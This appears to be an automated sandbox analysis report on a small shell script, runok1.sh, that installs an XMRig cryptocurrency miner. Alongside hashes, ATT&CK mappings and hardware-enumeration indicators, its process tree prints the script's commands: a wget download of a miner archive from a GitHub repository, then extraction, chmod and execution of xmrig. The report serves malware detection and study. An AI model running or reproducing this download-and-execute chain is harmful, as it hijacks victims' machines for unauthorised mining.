Analysis
-
max time kernel
1799s -
max time network
1783s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240729-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
17-10-2024 04:13
Static task
static1
Behavioral task
behavioral1
Sample
runok1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
runok1.sh
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral3
Sample
runok1.sh
Resource
ubuntu2204-amd64-20240729-en
Behavioral task
behavioral4
Sample
runok1.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runok1.sh
-
Size
138B
-
MD5
ed44ae7cc01f7bcc21c98a523afabd7c
-
SHA1
4e7f50162eeb61715a948d3359639c6910088860
-
SHA256
1663e111eceb895f9be9e87c6cfda675e506cd8ec88d144fd1a2b5dc7081d0de
-
SHA512
e1c895b50b2b259d40501497ae4f9b2bb77b2d8713cd584d9c83cab82898f5e134ba6c8320810bf649867156494ea5b656143b71e269c9490da210d48a52982c
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule /tmp/ok/xmrig family_xmrig /tmp/ok/xmrig xmrig -
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 1583 chmod -
Executes dropped EXE 1 IoCs
Processes:
xmrigioc pid process /tmp/ok/xmrig 1584 xmrig -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Processes:
xmrigdescription ioc process File opened for reading /sys/devices/virtual/dmi/id/product_name xmrig File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrig -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com -
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Processes:
xmrigdescription ioc process File opened for reading /sys/devices/virtual/dmi/id/product_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/board_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrig File opened for reading /sys/devices/virtual/dmi/id/board_name xmrig File opened for reading /sys/devices/virtual/dmi/id/board_version xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_date xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_version xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/product_version xmrig File opened for reading /sys/devices/virtual/dmi/id/product_uuid xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_version xmrig -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
xmrigdescription ioc process File opened for reading /proc/cpuinfo xmrig -
Reads CPU attributes 1 TTPs 45 IoCs
Processes:
xmrigdescription ioc process File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type xmrig File opened for reading /sys/devices/system/cpu/possible xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition xmrig File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency xmrig File opened for reading /sys/devices/system/cpu/online xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size xmrig -
Enumerates kernel/hardware configuration 1 TTPs 24 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
xmrigdescription ioc process File opened for reading /sys/fs/cgroup/cgroup.controllers xmrig File opened for reading /sys/kernel/mm/hugepages xmrig File opened for reading /sys/devices/system/node/node0/meminfo xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth xmrig File opened for reading /sys/firmware/dmi/tables/smbios_entry_point xmrig File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages xmrig File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages xmrig File opened for reading /sys/devices/system/node/online xmrig File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators xmrig File opened for reading /sys/firmware/dmi/tables/DMI xmrig File opened for reading /sys/fs/cgroup/cpuset.cpus.effective xmrig File opened for reading /sys/devices/system/cpu xmrig File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages xmrig File opened for reading /sys/devices/system/node/node0/hugepages xmrig File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages xmrig File opened for reading /sys/devices/system/node/node0/access1/initiators xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth xmrig File opened for reading /sys/fs/cgroup/cpuset.mems.effective xmrig File opened for reading /sys/devices/system/node/node0/cpumap xmrig File opened for reading /sys/bus/dax/devices xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency xmrig File opened for reading /sys/devices/virtual/dmi/id xmrig -
Processes:
tarxmrigdescription ioc process File opened for reading /proc/filesystems tar File opened for reading /proc/mounts xmrig File opened for reading /proc/self/cpuset xmrig File opened for reading /proc/meminfo xmrig File opened for reading /proc/driver/nvidia/gpus xmrig File opened for reading /proc/sys/vm/nr_hugepages xmrig -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgettarxmrigdescription ioc process File opened for modification /tmp/ok.tar.gz wget File opened for modification /tmp/ok/SHA256SUMS tar File opened for modification /tmp/ok/config.json tar File opened for modification /tmp/ok/xmrig tar File opened for modification /tmp/ok/config.json xmrig
Processes
-
/tmp/runok1.sh/tmp/runok1.sh1⤵PID:1568
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/ok.tar.gz2⤵
- Writes file to tmp directory
PID:1569 -
/usr/bin/tartar xvf ok.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1581 -
/usr/local/sbin/gzipgzip -d3⤵PID:1582
-
/usr/local/bin/gzipgzip -d3⤵PID:1582
-
/usr/sbin/gzipgzip -d3⤵PID:1582
-
/usr/bin/gzipgzip -d3⤵PID:1582
-
/usr/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:1583 -
/tmp/ok/xmrig./xmrig2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1584
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD5b3071552f6bd22d2cb0661331c98a883
SHA17bb3fe0a516167c52e9ef4c72815d45351a65477
SHA25687679fe052039e400d6cb5f0184f6d0cef7572ab6899d5bb76b115ae754f2da7
SHA51223ce89dfdc4c160b7d808659bc0290afa80a789206aeca24254f0e1e80739ddcab580159fa73702cb237662e430cbd07308413f44ae432c12acf49c97081a8f7
-
Filesize
2.9MB
MD57cfcd8684e6e5c13287c16e6c40c5efb
SHA13e9202eb800602aa947b7a48cabadb4bd9742b35
SHA2566c8df670c44f35e0015cd709b975e5e8a6616ca346b602d3ea4f3894ddf777ca
SHA512679a968ef46605ec78ad9b72b594b96ae28ca73ea99f892ed5c69b5f264d76e03db60caa13454cf7b7d28a99dffcb134b4ce3b25f00c37846999cbbae22c4b94
-
Filesize
150B
MD57fd26dcea92a3ad3561867c5735c8ecc
SHA1400fe1a03ef6d4520b88f0c63002266586cdaa0f
SHA256c2db0386506ea30d3b7c375ff40dfc875c2aa7961beb7806a36cf12fc10405b6
SHA512b114cee7f7da66afc53aca2013c63ed0d12740cca8ad46a5164789fe33f1889a2ec313186a29c4fc1dd30a11041db31bb307be1884e15680f4b7627143cbf6d8
-
Filesize
2KB
MD506a36033ace7787c6d0677950a5e9f7f
SHA1f052c6419d293febe45fd3d9a9be4808854f1a5b
SHA256ce35d1da303888ed10bd705dbb12c3319cc76fb5341df3ef08dd06a7953a3f4d
SHA51261a039548095de8cd7f7303175aadad78934548437a101c0dffbaf0346bf0504bcbcadaadd55b8d4df160b4bf6e482245973ccbe75857da149dc45d07f49c02b
-
Filesize
1KB
MD51879742a3f028a8e227f3b6b51756269
SHA120365c0cf35e787f525baede3646cfdfe6001cba
SHA2564042908287a7c60eb515d2c180a03d25156b4001af6cba1ad823461cc86751c5
SHA512e7d918532dd029a53b803df0df2e4e61416e18b58ffabe18b542cd30b111f266e98d73aad8ffe62a79af50e4f21d7e19415ee03ff104eb36aaad2cf1903e9731
-
Filesize
6.7MB
MD58f633ade35df4f992eb28a2c5bc37cef
SHA16b2fe529339896b22328dec8936219e7b8e3252f
SHA256364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c
SHA5128073ded4e0b5d6333ecb0b324cf09c023dfa99c6110ad6f86225f1a4b9a0dcdf88bd094da9c920a8b729c020990dba9f263481030dec463ab9fbc41cba050c73